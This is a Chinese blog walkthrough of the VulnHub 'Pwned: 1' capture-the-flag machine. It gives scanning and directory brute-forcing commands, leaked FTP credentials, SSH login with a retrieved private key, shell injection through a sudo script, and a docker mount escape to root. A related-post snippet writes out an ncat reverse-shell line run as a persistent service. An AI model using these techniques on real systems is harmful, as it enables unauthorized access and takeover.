vulnhub Pwned: 1

已于 2022-10-04 18:07:03 修改
阅读量1.5k 收藏 3
点赞数
分类专栏: vulnhub 文章标签: docker提权 docker burp
于 2022-09-23 22:12:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/127018795
版权

渗透思路:

nmap扫描端口 ---- gobuster扫描网站目录 ---- burp爆破网站目录 ---- 网站源代码泄露ftp用户名密码 ---- ariana用户用id_rsa进行ssh登录 ---- sudo bash脚本提权到selena ---- 利用docker越权查看文件

环境信息:

靶机:192.168.101.107

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sC -sV -p- 192.168.101.107

扫描到21(ftp)、22(ssh)、80(http)端口

2、gobuster扫描网站目录

gobuster dir -u http://192.168.101.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到/nothing和/hidden_text

3、burp爆破网站目录

http://192.168.101.107/hidden_text/是一个目录,其中有一个文件secret.dic,看上去是个目录字典

http://192.168.101.107/hidden_text/secret.dic

用burp的intruder模块对网站目录进行爆破,爆破位置如下图所示

payload粘贴http://192.168.101.107/hidden_text/secret.dic中的内容

不要勾选URL-encode these characters

按Start attack开始爆破,爆破结果中只有/pwned.vuln状态码是301,其他都是404

4、网页源代码泄露ftp用户名密码

访问http://192.168.101.107/pwned.vuln/,是一个登录页面,查看网页源代码发现被注释掉的php代码

上图红框中的代码泄露了用户名为ftpuser,密码为B0ss_B!TcH

但这对用户名密码无法用于网站登录,因此想到尝试ftp登录

ftp 192.168.101.107

用户名和密码分别为ftpuser和B0ss_B!TcH,登录成功,发现share文件夹,进入share文件夹后发现两个文件:

id_rsa和note.txt

下载这两个文件

ftp> get note.txt
ftp> get id_rsa

5、ariana用户用id_rsa进行ssh登录

note.txt泄露了用户名ariana,可以猜测id_rsa属于ariana

ariana进行ssh登录

ssh -i id_rsa ariana@192.168.101.107

登录成功,得到第一个flag

6、sudo bash脚本提权到selena

执行sudo -l发现ariana可以在不需要输入密码的情况下以selena的身份sudo执行/home/messenger.sh

/home/messenger.sh内容如下,$msg(也就是提示符"Enter message for $name :"之后输入的内容)将被作为bash命令执行

#!/bin/bash

clear
echo "Welcome to linux.messenger "
		echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
		echo ""
echo "$users"
		echo ""
read -p "Enter username to send message : " name 
		echo ""
read -p "Enter message for $name :" msg
		echo ""
echo "Sending message to $name "

$msg 2> /dev/null

		echo ""
echo "Message sent to $name :) "
		echo ""

sudo执行 /home/messenger.sh

sudo -u selena /home/messenger.sh

在提示"Enter username to send message : "后面随便输入些字母,然后在提示"Enter message for $name :"之后输入bash,即可进入selena的shell。

在/home/selena/user2.txt中有第二个flag

7、利用docker提权到root

同时注意到,selena是docker组的用户。

docker | GTFOBins中可以看到,当用户属于docker组时,有运行docker的权限,从而可以利用docker命令将靶机根目录挂载到靶机内某个新容器的目录下,进而利用容器的root用户越权查看靶机上的文件。

执行如下命令将靶机的根目录挂载到alpine镜像(不一定非要用这个镜像,只要是靶机上有的镜像就行,靶机上没有也可以从攻击机上下载)创建的新容器的/mnt目录,并将/mnt目录设置为根目录

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

在/root/root.txt中有第三个flag

仙女象
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
OSCP-Pwned1(pwn题)
墨痕诉清风的博客
04-25 838
目录/hidden_text/包含一个文件secret.dic.我们可以提取这些信息并将其加载到。当阅读note.txt的内容时,看到e有一个潜在的用户名'ariana'。通过对feroxbuster运行secret.dic文件得到以下结果。查看根页面http://192.168.218.95。使用bash作为值再次运行脚本,然后能够执行。可以进入'share'目录并下载其中的内容。文件messenger.sh内容。命令得到用户selena。在端口80上打开了HTTP。该用户为docker组成员。
Dirpro 一款更为准确的目录扫描工具
wuli1024的博客
11-17 416
在渗透测试的前期,对站点目录扫描是非常重要的步骤。利用扫描工具的扫描,我们得到一些非常重要的信息。如网站管理后台、备份目录、一些敏感文件等。
最好的目录扫描工具dirsearch-master非常详细使用方法,中高级工程师网络安全开发
最新发布
2301_82243078的博客
04-20 1152
使用网上收集的Springboot-ActuatorExploit字典都扫描不出目录,但使用这个默认字典能扫描出/swagger-resources目录。但其他字典可以在dirsearch使用,估计是dirsearch在调用字典时有一些策略。注:requirements.txt文件在dirsearch-master目录里面,所以是进入dirsearch-master目录后执行的命令。//采用指定路径的wordlist且拓展名为php,txt,js的字典扫描目标url。3)使用指定字典扫描批量url的目录
VulnHub PWNED 1
Innocence_0的博客
09-11 76
1、首先使用 sudo arp-scan -l 命令对局域网内的主机进行扫描,并推断出该目标ip地址2、接着使用nmap,对该主机进行端口扫描nmap -sV -A 192.168.1.8,就发现该主机开启了21,22,80端口。3、使用浏览器访问该ip地址,但该网页仅仅只有文字无相关详细信息,我们也可以对该网页进行查看源代码,看是否存在脚本、或相关信息,得到一些嘲讽的信息4、方法一:接着我们使用DirBuster工具对后台目录进行探测,然后选择该字典爆破后台目录,相关配置如图所示。
1-11 Burpsuite 目录扫描探测
山兔的博客
12-01 5112
目录扫描原理 利用Burpsuite Intruder模块进行不断枚举,然后对响应状态码筛选。从而得出站点目录下那些文件存在,那些文件不存在 对GET提交的目录或者是对应的网页进行测试,设置Sniper 实战演示 打开Burpsuite,启动 打开测试的网站 在这个过程中,我们要准备网页对应的字典文件 开启截断,拦截数据包 发送到Intruder模块 Intruder>Positions,选Sniper Clear § 在域名处输入字符,选中输入的字符,Add § Payload选择R
Linux中使用nmap基本使用以及扫描一组计算机的脚本
没刮胡子的程序员专栏
07-13 1189
Nmap(Network Mapper)是一个开源的网络探测和安全评估工具。它用于扫描和发现网络上的主机、端口和服务,以及评估网络的安全性
Nmap的几种扫描方式以及相应的命令
Sumarua的博客
02-28 7408
Nmap的几种扫描方式以及相应的命令
pwned:使用Pwned Passwords API的简单Ruby方法
02-05
使用Pwned Passwords API的一种简单的Ruby方法。 | 目录 关于 Troy Hunt的允许您检查是否在任何重大数据泄露事件中找到密码。 Pwned是一个Ruby库,可以使用Pwned Passwords API的 Anonymity 针对API测试密码,而...
Maltego-haveibeenpwned:Maltego的https集成
05-24
1. 安装Maltego客户端:首先,你需要拥有一个有效的Maltego许可证,并在本地或服务器上安装Maltego客户端。 2. 获取HIBP API密钥:HIBP提供了一个API,但为了使用,你需要在HIBP网站上注册并获取API密钥。这个密钥...
pwned:用于查询“我是否已被伪造?”的命令行工具。 服务
04-12
为了使用某些pwned命令(例如ba , pa和search ),您将需要并运行pwned apiKey 来配置pwned 。 其他命令不需要API密钥,并且您可能在未获得API密钥的情况下使用它们。 用法 pwned Commands: pwned apiKey <key> ...
is_my_password_pwned:您的密码多久出现在“ Pwned Passwords”数据库中? 使用k-匿名API
05-25
$ ./pwned_pass.sh REMINDER: This tool does not check password strength! Type a password and hit Enter (leave empty to exit): Hash prefix: 5baa6 Hash suffix: 1e4c9b93f3f0682250b6cf8331b7ee68fd8 ...
渗透测试之目录扫描
03-18
DirBuster-1.0-RC1主要用于渗透测试必备工具之一,主要网站目录扫描,信息收集,支持php,asp、jsp、aspx、以及Java等信息收集,通过扫描的结果进一步利用,发现站点漏洞,有利于下一步测试。
nodejs-haveibeenpwned:HaveIBeenPwnd.com的API方法(非官方)
05-03
const hibp = require ( 'haveibeenpwned' ) ( ) ; hibp . breachedAccount ( 'foo@bar.com' , ( err , data ) => { if ( err ) { return console . log ( err ) ; } console . log ( data ) ; } ) ; 安装 npm i...
使用Burp爬取网站页面
WeiMengPing_的博客
06-27 659
Burp Suite是一款集成化的渗透测试工具,包含了很多功能,可以帮助我们高效地完成对Web应用程序的渗透测试和攻击。Burp Suite由Java语言编写,基于Java自身的跨平台性,使这款软件学习和使用起来更方便。Burp Suite不像其他自动化测试工具,它需要手工配置一些参数,触发一些自动化流程,然后才会开始工作。Burp Suite可执行程序是Java文件类型的jar文件,免费版可以从官网下载。
【2024最新版】超详细NMAP安装保姆级教程,Nmap的介绍、功能并进行网络扫描,收藏这一篇就够了
Python_0011的博客
01-31 7323
而端口被定义为filtered 状态的原因是是报文被防火墙设备,路由器规则,或者防火墙软件拦截,无法送达到端口,这通常表现为发送NMAP的主机收到ICMP报错报文,或者主机通过多次重复发送没有收到任何回应)。这种状态只会出现在open端口对报文不做回应的扫描类型中,如:udp,ip protocol ,TCP null,fin,和xmas扫描类型。当测试目标是一个网络时,在线的主机才是我们的用主机发现的目标,nmap中提供了许多主机发现的方法,大多与TCP/IP协议簇中的协议有关。
ubuntu 配置NFS到开发板
wasapp的博客
07-25 397
ubuntu 搭建nfs到开发板
burpsuite爆破目录的注意事项
weixin_50464560的博客
08-15 1629
1.进行抓包   2.将其发送到lntruder   3.使用替换脚本替换掉/   4.替换   5.替换结果   6.将多余的$$删除,在/后面添加$$    //$$就是payload   7.测试结果    替换脚本代码: ?123456789101112131415161718192021222324252627import osimport reuser =
创建一个服务,开机反弹shell。
haha1314的博客
04-30 493
用虚拟机win7做服务器 首先写一个反弹shell的批处理文件,如:.bat格式 保存为www.bat IP地址写你自己本机的IP,win7的ncat的存放路径 d:\\nmap\\ncat.exe 192.168.101.107 8080 -e C:\\windows\\system32\\cmd.exe 再用windows自带的工具将他编译成.exe文件 再编写一个文件保存.cs格式 ...
Nmap扫描教程之基础扫描详解
热门推荐
大学霸__IT达人
06-29 2万+
Nmap扫描教程之基础扫描详解
privacy个人数据泄漏检测网站
03-08
1. Have I Been Pwned (https://haveibeenpwned.com/): 这是一个非常知名的个人数据泄漏检测网站,它收集了大量的公开数据泄漏信息,并允许用户通过输入自己的电子邮件地址或用户名来检查是否存在泄漏风险。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值